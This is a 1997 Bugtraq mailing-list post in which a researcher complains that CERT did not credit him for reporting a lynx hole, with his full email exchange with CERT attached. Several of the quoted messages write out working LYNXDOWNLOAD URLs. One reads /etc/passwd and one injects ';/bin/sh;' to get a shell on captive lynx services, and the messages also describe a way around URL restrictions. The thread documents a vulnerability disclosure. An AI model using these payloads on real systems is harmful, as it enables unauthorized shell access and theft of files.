Home page logo
/

bugtraq logo Bugtraq mailing list archives

CERT does it again.
From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 22 Jul 1997 09:43:00 -0400


This is a post about CERT, and about how i didnt get credit for telling them
about a hole i found.  ive got pretty much every letter from me to them..

Here's basically what happened (as i see it)

1) i told cert about it, they tried some crazy nonsensical things to get it
        to work that the average unix user would know dont work.
2) they got the hole to work locally but they didnt appear to realize it was a
        hole (and i thought security profs would)
3) they posted it to the lynx-dev list, which is open (i think), and by
        doing that they released the hole to the public. (i thought that
        cert was supposed to keep holes under wraps until they get them fixed)
4) they posted a VB that had a 'workaround' that didnt actually solve the
        problem. (even if you cant 'g' to a URL you can still hit '?' or 'v'
        depending on the version and if bookmarks are on and usually get to
        yahoo. you can enter url tags at a yahoo seach prompt and force
        a LYNXDOWNLOAD..) plus, i said that in the end of my first letter to
        them.

Im really let down by CERT.  From now on im posting straight to bugtraq.

To CERT: i told you about this hole.  Without me, you wouldnt have known,
and the least you could do is get me the credit i deserved.

-------------------------------------------------------------------------------

From dynamo () ime net Thu Jul 17 22:52:48 1997
Date: Fri, 13 Jun 1997 13:57:01 -0400 (EDT)
From: dynamo () ime net
To: cert () cert org
Cc: brent () ime net
Subject: Hello, I believe youll find this interesting.

I spoke to one of your people on the phone today, and she said pretty
much that if you provide info that you guys dont already have, that you
would give credit to the person who told you inside the advisory. with
that in mind, i would like to tell you about something ive noticed. it
related to universities and WAIS systems that use lynx in order to display
pages.  if you feed lynx a url like:
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
on many systems it will show you their file, on a surprisingly large
number of systems there is now shadow.  sometimes you cant use /dev/stdin
and you need your tty or some other place. now, because this calls
system() (i think.. i didnt check the source)
LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
also works and gives you a shell prompt.  i believe that this is a real
problem for many universities out there.
Now, if someone cannot (g) to a random URL, they can
usually manuever to yahoo... and from there get a link redirector to go to
these sites in <a href="">a</a> format.  Note: this pretty much makes
disallowing lynxexec: and file: as well as (g) useless.
Thanks,
dynamo

-------------------------------------------------------------------------------

From cert () cert org Thu Jul 17 22:50:34 1997
Date: Tue, 17 Jun 97 10:22:04 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: dynamo () ime net
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

-----BEGIN PGP SIGNED MESSAGE-----

Hi Dynamo,

<dynamo () ime net> writes:
pages.  if you feed lynx a url like:
LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
on many systems it will show you their file, on a surprisingly large
number of systems there is now shadow.  sometimes you cant use /dev/stdin
and you need your tty or some other place. now, because this calls
system() (i think.. i didnt check the source)
LYNXDOWNLOAD://Method=-1/File=;/bin/sh;/SugFile=/dev/stdin
also works and gives you a shell prompt.  i believe that this is a real
problem for many universities out there.
Now, if someone cannot (g) to a random URL, they can
usually manuever to yahoo... and from there get a link redirector to go to
these sites in <a href="">a</a> format.  Note: this pretty much makes
disallowing lynxexec: and file: as well as (g) useless.

We tried both the of exploits that you discuss here, and we must be missing
something as we couldn't get either of them to work.

In the first case, what we did was attempt to attack the machine
"www.victim.example.com" from the machine "attacker.example.org" (note the
different domains - these are machine on separate networks).

        attacker.example.org %  lynx http://www.victim.example.com
                { and within lynx ... }
        g
        LYNXDOWNLOAD://Method=-1/File=/etc/passwd/SugFile=/dev/stdin
        Enter a filename: /usr/users/attacker/tmp/foo

The file "/usr/users/attacker/tmp/foo" contains the password file from
attacker.example.org, not the password file from www.victim.example.com.

The next test we tried was to attack the local machine, to see if we could
read the /etc/shadow file:

        attacker.example.org %  lynx /etc/shadow
        Alert!:  Unable to access document.
        lynx: Can't access start file file://localhost/{...}/etc/shadow

which would be expected since /etc/shadow is not world readable, and lynx
is not a setuid program.

        attacker.example.org %  lynx http://www.attacker.example.org
                { and within lynx ... }
        g
        LYNXDOWNLOAD://Method=-1/File=/etc/shadow/SugFile=/dev/stdin
        Enter a filename: /usr/users/attacker/tmp/foo
        -- press space for next page --/shadow: Permission denied

Finally, we tried the second exploit you gave above, and the terminal
froze with the following errors:

        Saving.....cp: Insufficient arguments (0)
          Arrow keys: Up and Down to move. Right Usage: cp [-f] [-i] [-p] f1 f2ack.
         H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history       cp [-f] [-i] [-p] f1 ... fn d1
                                           cp -r|R [-f] [-i] [-p] d1 ... dn-1 dn
                                                                                (\!) \h \$

An attempt to use the second exploit with this modified operation:

        LYNXDOWNLOAD://Method=-1/File=/dev/null;/bin/sh

also failed to produce a shell.

Is there some other part of the exploit that we have misunderstood?  Thanks
for your report -- we look forward to any further pointers you may have.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM6anMHVP+x0t4w7BAQHTPQP9FMuNoaLRiwWEU/fTDyuOn6zOnjFZlFXc
x5yvnGSojfWuQBCmGn3HTVDk+Kf7h2T8igdWUPtim9UGOW6uyMk/z4z1W/m+mHQ7
Rb2uTDdEyy7wJCVtdd1UkEaDwovt4m8Jx4BeDbA7feycaL0m3ypfWVPaAPVr0Nu0
BH7fLzp0Iw8=
=+nB7
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------

From dynamo () ime net Thu Jul 17 22:53:09 1997
Date: Wed, 18 Jun 1997 21:38:54 -0400 (EDT)
From: dynamo () ime net
To: "CERT(R) Coordination Center" <cert () cert org>
Cc: brent () ime net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

Well, first ive gotten it to work, Im currently away from my house right
now and dont have the machine name on me.. it was a [edited out] machine and i
emailed the person who runs it alreday. i grabbed this from the email i
had sent him.. ill give you a bigger list of affected boxes wheni get
back.
heres my screen capture:
[7mSaving.....
[K/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.

bash$ bin           dev         lib         proc        tmp

vmlinuz

boot        etc         lost+found  root        usr         zImage

cdrom       home        mnt         sbin        var         zImage.mem

bash$
---------------
ill send you more info in a bit. this does work.
first off the file you select as sugfile must be writable if you do put
one in, second, all you ned to do is disable downloading and this problem
is fixed. i wouldnt have emailed you if it didnt work.
dynamo
-------------------------------------------------------------------------------

From cert () cert org Thu Jul 17 22:50:47 1997
Date: Thu, 19 Jun 97 17:39:43 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: dynamo () ime net
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

First, thanks for the feedback.

<dynamo () ime net> writes:
Well, first ive gotten it to work, Im currently away from my house right
now and dont have the machine name on me.. it was a [edited out] machine and i
emailed the person who runs it alreday. i grabbed this from the email i
had sent him.. ill give you a bigger list of affected boxes wheni get
back.
heres my screen capture:
[7mSaving.....
[K/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.

bash$ bin           dev         lib         proc        tmp

vmlinuz

boot        etc         lost+found  root        usr         zImage

cdrom       home        mnt         sbin        var         zImage.mem

bash$
---------------
ill send you more info in a bit. this does work.
first off the file you select as sugfile must be writable if you do put
one in, second, all you ned to do is disable downloading and this problem
is fixed. i wouldnt have emailed you if it didnt work.

Understood.  We know that you wouldn't have sent us mail if you didn't have
something that you think was worthwhile and needed addressing.  Since we've
been unable to replicate the problem that you are discussing, we want to
make sure that we are understanding what you are doing, so that we can
better understand the problem.  We're glad that you took the time to advise
us in the first place; our aim is to better understand what you are saying
in case we are missing something.

We tried the exploits again, and were able to get a shell on the local
machine, but not on the remote machine.

Can you send us a typescript (using the "script" command) where you
replicate the problem, executing a "uname -a" on the local machine, and
then when you get a shell on the remote machine, execute a "uname -a" in
that shell?  The typescript may show us something that you were doing that
we have missed.

Thanks again for any feedback.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR
wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A
qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU
jdrXV6nDje8=
=tayo
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------


From dynamo () ime net Thu Jul 17 22:53:31 1997
Date: Sat, 21 Jun 1997 23:01:03 -0400 (EDT)
From: dynamo () ime net
To: "CERT(R) Coordination Center" <cert () cert org>
Cc: brent () ime net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

Okay, now what i attached is something that i sent in email to the admin
of the box that it worked on.. as it worked by accident.. he didnt turn of
downloading like i emailed him that he should... in that case maybe he
didnt get it.. you may want to see if you can contact him.. ive tried
plenty of times and im sick of getting my mail bounced back.. after about
10 tries one didnt.. ANYWAY
its clearly a shell. note that i did not SEE my command line as i typed it
in, but after hitting enter it did execute.  I know it works on a few
other Operating systems than lynx. but like i said.. the answer is just
disallowing downloading. i believe there are more internal URLs in lynx
that cause problems.  i found this after doing a strings `which
lynx`|less.
so anyway, i hope you get the word out. for credit, "Aaron of Internet
Maine (ime.net)" would be great.

On Thu, 19 Jun 1997, CERT(R) Coordination Center wrote:

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

First, thanks for the feedback.

<dynamo () ime net> writes:
Well, first ive gotten it to work, Im currently away from my house right
now and dont have the machine name on me.. it was a [edited out] machine and i
emailed the person who runs it alreday. i grabbed this from the email i
had sent him.. ill give you a bigger list of affected boxes wheni get
back.
heres my screen capture:
[7mSaving.....
[K/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.

bash$ bin           dev         lib         proc        tmp

vmlinuz

boot        etc         lost+found  root        usr         zImage

cdrom       home        mnt         sbin        var         zImage.mem

bash$
---------------
ill send you more info in a bit. this does work.
first off the file you select as sugfile must be writable if you do put
one in, second, all you ned to do is disable downloading and this problem
is fixed. i wouldnt have emailed you if it didnt work.

Understood.  We know that you wouldn't have sent us mail if you didn't have
something that you think was worthwhile and needed addressing.  Since we've
been unable to replicate the problem that you are discussing, we want to
make sure that we are understanding what you are doing, so that we can
better understand the problem.  We're glad that you took the time to advise
us in the first place; our aim is to better understand what you are saying
in case we are missing something.

We tried the exploits again, and were able to get a shell on the local
machine, but not on the remote machine.

Can you send us a typescript (using the "script" command) where you
replicate the problem, executing a "uname -a" on the local machine, and
then when you get a shell on the remote machine, execute a "uname -a" in
that shell?  The typescript may show us something that you were doing that
we have missed.

Thanks again for any feedback.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR
wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A
qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU
jdrXV6nDje8=
=tayo
-----END PGP SIGNATURE-----


  [Part 2, ""  Text/PLAIN  40 lines]
  [Unable to print this part]
-------------------------------------------------------------------------------

From dynamo () ime net Thu Jul 17 22:53:53 1997
Date: Sun, 22 Jun 1997 02:08:20 -0400 (EDT)
From: dynamo () ime net
To: "CERT(R) Coordination Center" <cert () cert org>
Cc: brent () ime net
Subject: Re: Hello, I believe youll find this interesting. (INFO#97.19354)

On the same bug i was talking about...
Oh on another note.. what if someone did something like this:

<HTML><TITLE>lame</TITLE><BODY>
see my page
</BODY></HTML>


On Thu, 19 Jun 1997, CERT(R) Coordination Center wrote:

-----BEGIN PGP SIGNED MESSAGE-----

Hi,

First, thanks for the feedback.

<dynamo () ime net> writes:
Well, first ive gotten it to work, Im currently away from my house right
now and dont have the machine name on me.. it was a [edited out] machine and i
emailed the person who runs it alreday. i grabbed this from the email i
had sent him.. ill give you a bigger list of affected boxes wheni get
back.
heres my screen capture:
[7mSaving.....
[K/bin/cp: missing file arguments
Try `/bin/cp --help' for more information.

bash$ bin           dev         lib         proc        tmp

vmlinuz

boot        etc         lost+found  root        usr         zImage

cdrom       home        mnt         sbin        var         zImage.mem

bash$
---------------
ill send you more info in a bit. this does work.
first off the file you select as sugfile must be writable if you do put
one in, second, all you ned to do is disable downloading and this problem
is fixed. i wouldnt have emailed you if it didnt work.

Understood.  We know that you wouldn't have sent us mail if you didn't have
something that you think was worthwhile and needed addressing.  Since we've
been unable to replicate the problem that you are discussing, we want to
make sure that we are understanding what you are doing, so that we can
better understand the problem.  We're glad that you took the time to advise
us in the first place; our aim is to better understand what you are saying
in case we are missing something.

We tried the exploits again, and were able to get a shell on the local
machine, but not on the remote machine.

Can you send us a typescript (using the "script" command) where you
replicate the problem, executing a "uname -a" on the local machine, and
then when you get a shell on the remote machine, execute a "uname -a" in
that shell?  The typescript may show us something that you were doing that
we have missed.

Thanks again for any feedback.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM6mo8HVP+x0t4w7BAQES0gP+PQAb5JVwyn6Qmv18cVJLzpIlApTzkMoR
wqvsntnkZ62lIH/xTBnpyjSytbASuMhV9NRD/bc93rCtzjBBAhqAjjyMW0PoD65A
qouCYpOj4rcDmlmD1RjEEc3XAvwFiDKRXFzKnM/QCsXfIoLOg4tp2cNq6TFRS4nU
jdrXV6nDje8=
=tayo
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------

From cert () cert org Thu Jul 17 22:51:10 1997
Date: Mon, 23 Jun 97 17:09:35 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: Aaron of Internet Maine <dynamo () ime net>
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: lynx vulnerability (VU#5135)

-----BEGIN PGP SIGNED MESSAGE-----

Hi Aaron,

Okay, now what i attached is something that i sent in email to the admin
of the box that it worked on.. as it worked by accident.. he didnt turn of
downloading like i emailed him that he should... in that case maybe he
didnt get it.. you may want to see if you can contact him.. ive tried
plenty of times and im sick of getting my mail bounced back.. after about
10 tries one didnt.. ANYWAY
its clearly a shell. note that i did not SEE my command line as i typed it
in, but after hitting enter it did execute.

Okay, thanks for sending in the script.  The script filled in the missing
link - we didn't realise that the machine you were connecting to was
running lynx under a captive service.  We'll be getting in touch with the
lynx folks.

Thanks again for your report.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBM67nB3VP+x0t4w7BAQHlqwP+JouvUYGTllRwv7zCbhLMUOatzcgw8oVp
rCKA/BlIroXALNWofjzhoJPiXjRCxY5cYCOvXUlvpFyvHduB3TYQiguDskjMCJY9
6rdStW6EmTyzw8aipCWOKegxZmV4lNhp/cv8ljeu1lUrqVwz+uFDTygdmccBXrKt
bgZ2c6XnVm0=
=hEXp
-----END PGP SIGNATURE-----

-------------------------------------------------------------------------------


From cert () cert org Thu Jul 17 22:51:27 1997
Date: Wed, 16 Jul 97 16:12:03 EDT
From: "CERT(R) Coordination Center" <cert () cert org>
To: dynamo () ime net
Cc: brent () ime net, "CERT(R) Coordination Center" <cert () cert org>
Subject: Re: lynx vulnerability (VU#5135)

Hi Aaron,

<dynamo () ime net> writes:
I notice that you released a vendor initiated bulletin.. with no credit
given to me.  would you mind fixing that?

Thanks for drawing that to our attention.  I'll pass that along to our
writers.

Thanks again for reporting the original problem to us.

Regards,
Rob.

| Rob McMillan                          Email:     cert () cert org
|| CERT Coordination Center (*)         Phone:     +1 (412) 268 7090 (24 x 7)
||| Software Engineering Institute      Fax:       +1 (412) 268 6989
|||| Carnegie Mellon University         Web:       http://www.cert.org
||||| Pittsburgh, Pa. 15213-3890        Timezone:  GMT-5 (EST)

* CERT is registered with the U.S. Patent and Trademark Office. The Software
  Engineering Institute is sponsored by the U.S. Department of Defense.

-------------------------------------------------------------------------------



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]